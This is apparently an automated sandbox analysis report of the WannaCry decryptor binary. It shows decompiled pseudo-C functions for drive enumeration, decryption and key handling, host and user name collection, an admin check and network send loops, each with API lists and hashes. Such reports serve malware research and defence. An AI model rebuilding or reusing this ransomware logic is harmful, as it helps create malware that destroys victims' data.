                                  						_t391 = _t391 + 0x20;
                                  					} while (_t293 <=  *((intOrPtr*)(_t236 + 0x410)));
                                  					goto L28;
                                  				} else {
                                  					_t33 = _t236 + 8; // 0x5c
                                  					_t392 = _t33;
                                  					do {
                                  						if(_t251 > 0) {
                                  							memset(_t392, 0, _t251 << 2);
                                  							_t403 = _t403 + 0xc;
                                  							_t251 =  *(_t403 + 0x2c);
                                  						}
                                  						_t292 = _t292 + 1;
                                  						_t392 = _t392 + 0x20;
                                  					} while (_t292 <=  *((intOrPtr*)(_t236 + 0x410)));
                                  					goto L23;
                                  				}
                                  			}


                                  APIs
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
                                  • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
                                  • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ??0exception@@ExceptionThrow
                                  • String ID:
                                  • API String ID: 941485209-0
                                  • Opcode ID: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                  • Instruction ID: fb0ef9a6f766abd1277d4fb3e7775c965cb771230ee66441beda5a672c207522
                                  • Opcode Fuzzy Hash: 1e118166748c2516ccf34b16e56ce24d223970c5c76bb6d30bfc94f2d512404d
                                  • Instruction Fuzzy Hash: 57E1E4716043458BD718CF29C4906AAB7E2BFCC308F09857EE889EB355DB34D941CB5A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403A20(intOrPtr _a4, intOrPtr _a8) {
                                  				union _ULARGE_INTEGER _v8;
                                  				union _ULARGE_INTEGER _v16;
                                  				intOrPtr _v20;
                                  				union _ULARGE_INTEGER _v24;
                                  				short _v28;
                                  				short _v32;
                                  				short _t23;
                                  				short _t34;
                                  				signed int _t47;
                                  				unsigned int _t50;
                                  
                                  				if( *((intOrPtr*)(_a8 + 8)) != 0) {
                                  					return 1;
                                  				} else {
                                  					_t50 = GetLogicalDrives();
                                  					_t47 = 2;
                                  					do {
                                  						if((_t50 >> _t47 & 0x00000001) != 0) {
                                  							_t23 =  *L" : "; // 0x3a0020
                                  							_t34 =  *0x420760; // 0x20
                                  							_v32 = _t23;
                                  							_t7 = _t47 + 0x41; // 0x43
                                  							_v28 = _t34;
                                  							_v32 = _t7;
                                  							_v28 = 0x5c;
                                  							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
                                  								_v28 = 0;
                                  								E004026B0(_a4,  &_v32);
                                  							}
                                  						}
                                  						_t47 = _t47 + 1;
                                  					} while (_t47 <= 0x19);
                                  					return 1;
                                  				}
                                  			}


                                  APIs
                                  • GetLogicalDrives.KERNEL32 ref: 00403A35
                                  • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                  • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                  • String ID: : $\
                                  • API String ID: 222820107-856521285
                                  • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                  • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E0040D300(intOrPtr* __ecx, void* _a4, void* _a8, void* _a12, void* _a16) {
                                  				void _v1024;
                                  				char _v1028;
                                  				intOrPtr _v1032;
                                  				intOrPtr _v1036;
                                  				void* _v1040;
                                  				intOrPtr _v1044;
                                  				char _v1048;
                                  				signed int _t34;
                                  				void* _t36;
                                  				intOrPtr _t37;
                                  				void* _t43;
                                  				void* _t45;
                                  				intOrPtr _t46;
                                  				void* _t49;
                                  				signed int _t58;
                                  				intOrPtr* _t60;
                                  				signed int _t70;
                                  				signed int _t71;
                                  				signed int _t78;
                                  				void* _t83;
                                  				void* _t91;
                                  				void* _t102;
                                  				void* _t103;
                                  				void* _t104;
                                  				void* _t105;
                                  				void** _t107;
                                  				void** _t109;
                                  
                                  				_t106 =  &_v1040;
                                  				_t105 = _a8;
                                  				_t60 = __ecx;
                                  				_v1032 = 0;
                                  				if(_t105 != 0) {
                                  					_t34 = E0040D5D0(__ecx);
                                  					__eflags = _t34;
                                  					if(_t34 != 0) {
                                  						__eflags = _a12;
                                  						if(_a12 == 0) {
                                  							_t36 = _a4;
                                  							_v1040 = _t36;
                                  							_t91 = _t36;
                                  							goto L13;
                                  						} else {
                                  							__eflags = _a16;
                                  							if(_a16 != 0) {
                                  								__eflags = _t105 - 0x400;
                                  								if(_t105 > 0x400) {
                                  									_t49 = E00412A90(_t105);
                                  									_t109 =  &(( &_v1040)[1]);
                                  									_v1040 = _t49;
                                  									__eflags = _t49;
                                  									if(_t49 != 0) {
                                  										_t103 = _a4;
                                  										_t70 = _t105;
                                  										_t71 = _t70 >> 2;
                                  										memcpy(_t49, _t103, _t71 << 2);
                                  										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
                                  										_t106 =  &(_t109[6]);
                                  										_t91 = _v1040;
                                  										E0040D2B0(_t60, _t91, _t105);
                                  										goto L13;
                                  									} else {
                                  										return _t49;
                                  									}
                                  								} else {
                                  									_t104 = _a4;
                                  									_t78 = _t105 >> 2;
                                  									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
                                  									_t106 =  &(( &_v1040)[6]);
                                  									_t83 =  &_v1024;
                                  									_t91 = _t83;
                                  									_v1040 = _t83;
                                  									E0040D2B0(_t60, _t91, _t105);
                                  									goto L13;
                                  								}
                                  							} else {
                                  								_t91 = _a4;
                                  								E0040D2B0(__ecx, _t91, _t105);
                                  								L13:
                                  								_push( &_v1028);
                                  								L0041303E();
                                  								_t37 = _v1028;
                                  								_t107 =  &(_t106[1]);
                                  								_t102 = 0;
                                  								_v1036 = _t37;
                                  								__eflags = _t105;
                                  								if(_t105 > 0) {
                                  									while(1) {
                                  										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
                                  										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
                                  											goto L25;
                                  										}
                                  										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
                                  										__eflags = _t43;
                                  										if(__eflags > 0) {
                                  											_t102 = _t102 + _t43;
                                  											__eflags = _t102;
                                  											_push( &_v1048);
                                  											goto L24;
                                  										} else {
                                  											if(__eflags != 0) {
                                  												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
                                  												__eflags = _t45 - 0x2733;
                                  												if(_t45 == 0x2733) {
                                  													_t46 = _v1044;
                                  													__eflags = _t46 - 0x64;
                                  													_v1044 = _t46 + 1;
                                  													if(_t46 > 0x64) {
                                  														Sleep(0x64);
                                  														_v1044 = 0;
                                  													}
                                  													_push( &_v1048);
                                  													L24:
                                  													L0041303E();
                                  													_t107 =  &(_t107[1]);
                                  													__eflags = _t102 - _t105;
                                  													if(_t102 < _t105) {
                                  														_t37 = _v1048;
                                  														continue;
                                  													}
                                  												}
                                  											}
                                  										}
                                  										goto L25;
                                  									}
                                  								}
                                  								L25:
                                  								__eflags = _t91 - _a4;
                                  								if(_t91 != _a4) {
                                  									__eflags = _t91 -  &_v1024;
                                  									if(_t91 !=  &_v1024) {
                                  										__eflags = _t91;
                                  										if(_t91 != 0) {
                                  											free(_t91);
                                  										}
                                  									}
                                  								}
                                  								return _t102;
                                  							}
                                  						}
                                  					} else {
                                  						_t58 = _t34 | 0xffffffff;
                                  						__eflags = _t58;
                                  						return _t58;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}































                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
                                  • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                  • Opcode Fuzzy Hash: c8f85ea80c3b6b8e9e311ac575965a537163168bbe12e9f95371609f99db3755
                                  • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 76%
                                  			E00404AF0(void* __ecx, void* _a4, int _a8) {
                                  				intOrPtr* _v4;
                                  				void* _v8;
                                  				signed int _v12;
                                  				int _t12;
                                  				void* _t19;
                                  				signed int _t22;
                                  				signed int _t23;
                                  				struct _CRITICAL_SECTION* _t30;
                                  				void* _t36;
                                  
                                  				_t19 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 8)) != 0) {
                                  					_t2 = _t19 + 0x10; // 0x14
                                  					_t30 = _t2;
                                  					EnterCriticalSection(_t30);
                                  					_t36 = _a4;
                                  					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
                                  					_push(_t30);
                                  					if(_t12 != 0) {
                                  						LeaveCriticalSection();
                                  						_t22 = _v12;
                                  						_t23 = _t22 >> 2;
                                  						memcpy(_v8, _t36, _t23 << 2);
                                  						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
                                  						return 1;
                                  					} else {
                                  						LeaveCriticalSection();
                                  						return 0;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}













                                  APIs
                                  • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                  • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CryptDecryptEnterLeave
                                  • String ID:
                                  • API String ID: 1395129968-0
                                  • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                  • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 60%
                                  			E0040BED0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                  				char _v0;
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr _v36;
                                  				void _v311;
                                  				char _v312;
                                  				char _v332;
                                  				char _v572;
                                  				void _v611;
                                  				char _v612;
                                  				intOrPtr _v616;
                                  				long _v620;
                                  				char _v633;
                                  				intOrPtr _t29;
                                  				signed int _t30;
                                  				signed int _t32;
                                  				signed int _t50;
                                  				char _t51;
                                  				char _t54;
                                  				signed int _t67;
                                  				intOrPtr _t83;
                                  
                                  				_t29 =  *[fs:0x0];
                                  				_t50 =  *0x422210; // 0xb24228
                                  				_push(0xffffffff);
                                  				_push(E0041429E);
                                  				_push(_t29);
                                  				 *[fs:0x0] = _t83;
                                  				if(_t50 != 0) {
                                  					_t29 =  *((intOrPtr*)( *_t50 + 0xc))();
                                  					_t67 =  *0x422210; // 0xb24228
                                  					if(_t67 != 0) {
                                  						_t29 =  *((intOrPtr*)( *_t67))(1);
                                  					}
                                  				}
                                  				_push(0x2c);
                                  				L00412CEC();
                                  				_v616 = _t29;
                                  				_v4 = 0;
                                  				if(_t29 == 0) {
                                  					_t30 = 0;
                                  				} else {
                                  					_t30 = E0040D5E0(_t29);
                                  				}
                                  				_v4 = 0xffffffff;
                                  				 *0x422210 = _t30;
                                  				if(_t30 != 0) {
                                  					_push(_a4);
                                  					_t32 = E0040BAF0();
                                  					if(_t32 == 0) {
                                  						_t51 =  *0x421798; // 0x0
                                  						_v612 = _t51;
                                  						memset( &_v611, 0, 0x4a << 2);
                                  						asm("stosw");
                                  						asm("stosb");
                                  						_v620 = 0x12b;
                                  						GetComputerNameA( &_v612,  &_v620);
                                  						_t54 =  *0x421798; // 0x0
                                  						_v312 = _t54;
                                  						memset( &_v311, 0, 0x4a << 2);
                                  						asm("stosw");
                                  						asm("stosb");
                                  						_v572 = 0;
                                  						_v620 = 0x12b;
                                  						GetUserNameA( &_v312,  &_v620);
                                  						_push(8);
                                  						_push(_a8);
                                  						E0040DC00(_a16);
                                  						E0040DD00(_a16,  &_v620);
                                  						_push(1);
                                  						_push( &_v633);
                                  						_v633 = _v0;
                                  						E0040DC00(_a16);
                                  						E0040DD00(_a16,  &_v332);
                                  						 *[fs:0x0] = _v36;
                                  						return 0;
                                  					} else {
                                  						 *[fs:0x0] = _v12;
                                  						return _t32 | 0xffffffff;
                                  					}
                                  				} else {
                                  					 *[fs:0x0] = _v12;
                                  					return _t30 | 0xffffffff;
                                  				}
                                  			}

























                                  APIs
                                  • #823.MFC42(0000002C), ref: 0040BF0C
                                  • GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
                                  • GetUserNameA.ADVAPI32 ref: 0040BFF5
                                    • Part of subcall function 0040DC00: ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040DC9E
                                    • Part of subcall function 0040DC00: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040DCAD
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Name$#823??0exception@@ComputerExceptionThrowUser
                                  • String ID:
                                  • API String ID: 2582426243-0
                                  • Opcode ID: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
                                  • Instruction ID: 83e3db62829b85d845063e2f81586b9f479c5ffe1e9c48acb6c19853c4e1520f
                                  • Opcode Fuzzy Hash: dfb134e3e20c56f6c43c465dd7d0b2bdc90d3be31fa2d905cc250f6dcb77a9ab
                                  • Instruction Fuzzy Hash: 8541C2706087829BD720DF64D854BAB7BE4EBC8710F004A3DF599933D0DB789508CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 93%
                                  			E0040D4C0() {
                                  				void* __ecx;
                                  				signed int _t17;
                                  				intOrPtr _t19;
                                  				signed int _t28;
                                  				void* _t29;
                                  				signed int _t30;
                                  				signed int _t31;
                                  				signed int _t33;
                                  				intOrPtr* _t34;
                                  				signed int _t48;
                                  				intOrPtr* _t50;
                                  				signed int _t51;
                                  				void* _t52;
                                  				void* _t53;
                                  
                                  				_t33 =  *(_t52 + 0x10);
                                  				_t51 = 0;
                                  				_t50 = _t34;
                                  				if(_t33 != 0) {
                                  					_t17 = E0040D5D0(_t50);
                                  					__eflags = _t17;
                                  					if(_t17 != 0) {
                                  						_push(_t52 + 0xc);
                                  						_t48 = 0;
                                  						L0041303E();
                                  						_t19 =  *((intOrPtr*)(_t52 + 0x14));
                                  						_t53 = _t52 + 4;
                                  						__eflags = _t33;
                                  						 *((intOrPtr*)(_t53 + 0x1c)) = _t19;
                                  						if(_t33 > 0) {
                                  							while(1) {
                                  								__eflags = _t19 -  *((intOrPtr*)(_t53 + 0x10)) -  *((intOrPtr*)(_t50 + 0x28));
                                  								if(_t19 -  *((intOrPtr*)(_t53 + 0x10)) >  *((intOrPtr*)(_t50 + 0x28))) {
                                  									goto L16;
                                  								}
                                  								_t28 =  *((intOrPtr*)( *_t50 + 0x24))( *((intOrPtr*)(_t50 + 4)), _t48 +  *((intOrPtr*)(_t53 + 0x18)), _t33 - _t48);
                                  								__eflags = _t28;
                                  								if(__eflags > 0) {
                                  									_t48 = _t48 + _t28;
                                  									__eflags = _t48;
                                  									_push(_t53 + 0x1c);
                                  									goto L15;
                                  								} else {
                                  									if(__eflags != 0) {
                                  										_t29 =  *((intOrPtr*)( *_t50 + 0x28))();
                                  										__eflags = _t29 - 0x2733;
                                  										if(_t29 == 0x2733) {
                                  											_t30 = _t51;
                                  											_t51 = _t51 + 1;
                                  											__eflags = _t30 - 0x64;
                                  											if(_t30 > 0x64) {
                                  												Sleep(0x64);
                                  												_t51 = 0;
                                  												__eflags = 0;
                                  											}
                                  											_push(_t53 + 0x1c);
                                  											L15:
                                  											L0041303E();
                                  											_t53 = _t53 + 4;
                                  											__eflags = _t48 - _t33;
                                  											if(_t48 < _t33) {
                                  												_t19 =  *((intOrPtr*)(_t53 + 0x1c));
                                  												continue;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								goto L16;
                                  							}
                                  						}
                                  						L16:
                                  						__eflags =  *(_t53 + 0x20);
                                  						if( *(_t53 + 0x20) != 0) {
                                  							E0040D2B0(_t50,  *((intOrPtr*)(_t53 + 0x18)), _t48);
                                  						}
                                  						return _t48;
                                  					} else {
                                  						_t31 = _t17 | 0xffffffff;
                                  						__eflags = _t31;
                                  						return _t31;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}


















                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
                                  • Instruction ID: 4ffb44c4908fbcdbada2a4de5981d2af022f8853c63cab2f762cb5961de049d3
                                  • Opcode Fuzzy Hash: 5e68fbcf5b22235d79db144bb8702833b1e0f7456deab8b0abe335e8fb721804
                                  • Instruction Fuzzy Hash: B121B172B042016FC314DF99AC84C6BB399EBD8358B104A3FF946D7381DA35DC09879A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 58%
                                  			E00401BB0() {
                                  				char _v3;
                                  				char _v4;
                                  				char _v5;
                                  				char _v6;
                                  				char _v7;
                                  				struct _SID_IDENTIFIER_AUTHORITY _v8;
                                  				void* _v12;
                                  				char _v16;
                                  				void* _v24;
                                  				long _v28;
                                  				int _t16;
                                  				void* _t17;
                                  
                                  				_v8.Value = 0;
                                  				_v7 = 0;
                                  				_v6 = 0;
                                  				_v5 = 0;
                                  				_v4 = 0;
                                  				_v3 = 5;
                                  				_v16 = 0;
                                  				_t16 = AllocateAndInitializeSid( &_v8, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                                  				if(_t16 != 0) {
                                  					_t17 = _v12;
                                  					__imp__CheckTokenMembership(0, _t17,  &_v16);
                                  					if(_t17 == 0) {
                                  						_v28 = 0;
                                  					}
                                  					FreeSid(_v24);
                                  					return _v28;
                                  				} else {
                                  					return _t16;
                                  				}
                                  			}
















                                  APIs
                                  • AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEC
                                  • CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 00401C06
                                  • FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401C19
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateCheckFreeInitializeMembershipToken
                                  • String ID:
                                  • API String ID: 3429775523-0
                                  • Opcode ID: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
                                  • Instruction ID: 94521974df2238a1dc1099b42d01a28c9688a26bfb2bc835d8f4af5c6999d558
                                  • Opcode Fuzzy Hash: a7a265a1dd536a0e0eab8576597306744b18f24eaa9b8ffe7a6d4444507be078
                                  • Instruction Fuzzy Hash: 3E012C71148380BFE340DB6888C4AABBFE8EBD4704FC4985DF58543252D234D848DB6B
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00404770(void* __ecx) {
                                  				long* _t7;
                                  				long* _t8;
                                  				long* _t9;
                                  				void* _t15;
                                  
                                  				_t15 = __ecx;
                                  				_t7 =  *(__ecx + 8);
                                  				if(_t7 != 0) {
                                  					CryptDestroyKey(_t7);
                                  					 *(_t15 + 8) = 0;
                                  				}
                                  				_t8 =  *(_t15 + 0xc);
                                  				if(_t8 != 0) {
                                  					CryptDestroyKey(_t8);
                                  					 *(_t15 + 0xc) = 0;
                                  				}
                                  				_t9 =  *(_t15 + 4);
                                  				if(_t9 != 0) {
                                  					CryptReleaseContext(_t9, 0);
                                  					 *(_t15 + 4) = 0;
                                  				}
                                  				return 1;
                                  			}








                                  APIs
                                  • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 0040477B
                                  • CryptDestroyKey.ADVAPI32(?,?,004049AD,00404990), ref: 00404790
                                  • CryptReleaseContext.ADVAPI32(FFFFFFFF,00000000,?,004049AD,00404990), ref: 004047A7
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Destroy$ContextRelease
                                  • String ID:
                                  • API String ID: 1308222791-0
                                  • Opcode ID: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
                                  • Instruction ID: 61d89c14c75fb5affeedc9811425020a0caf5e5d08399d1baa26ca37d3ca979d
                                  • Opcode Fuzzy Hash: 12ad5d49cc2128f0860c2128d2759e128a7075486b136358530e399bbd2bca92
                                  • Instruction Fuzzy Hash: 22E0EDB03007018BD7309F65D888B4377E8AF84714F04882DF85AE77D0C778E8408B54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 33%
                                  			E0040A9D0(intOrPtr __ecx, signed int _a4, signed char* _a8) {
                                  				void* _v12;
                                  				signed int _v16;
                                  				intOrPtr _v20;
                                  				intOrPtr _v24;
                                  				void* _v25;
                                  				void* _v26;
                                  				signed int _v28;
                                  				void* _v29;
                                  				void* _v30;
                                  				void* _v31;
                                  				signed int _v32;
                                  				void* _v33;
                                  				void* _v34;
                                  				void* _v35;
                                  				signed int _v36;
                                  				void* _v37;
                                  				void* _v38;
                                  				void* _v39;
                                  				signed int _v40;
                                  				signed int _t161;
                                  				signed int _t162;
                                  				signed char* _t165;
                                  				signed int _t187;
                                  				signed int _t188;
                                  				intOrPtr _t190;
                                  				signed int _t277;
                                  				signed int _t345;
                                  				signed int _t346;
                                  				signed int _t349;
                                  				signed int _t360;
                                  				signed int _t361;
                                  				signed int _t364;
                                  				intOrPtr _t375;
                                  				intOrPtr _t386;
                                  				void* _t387;
                                  				signed int _t388;
                                  
                                  				_t375 = __ecx;
                                  				_v24 = __ecx;
                                  				if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                  					__imp__??0exception@@QAE@ABQBD@Z(0x4213a8);
                                  					_push(0x41c9c0);
                                  					_push( &_v16);
                                  					L004130FC();
                                  				}
                                  				_t345 = 0xbadbad ^  *(_t375 + 0x1e8);
                                  				_v28 = 0 << 0x18;
                                  				_v40 = 0xbadbad ^  *(_v24 + 0x1ec);
                                  				_t277 = 0xbadbad ^  *(_v24 + 0x1f0);
                                  				_v32 = 0 << 0x18;
                                  				_t386 = _v24;
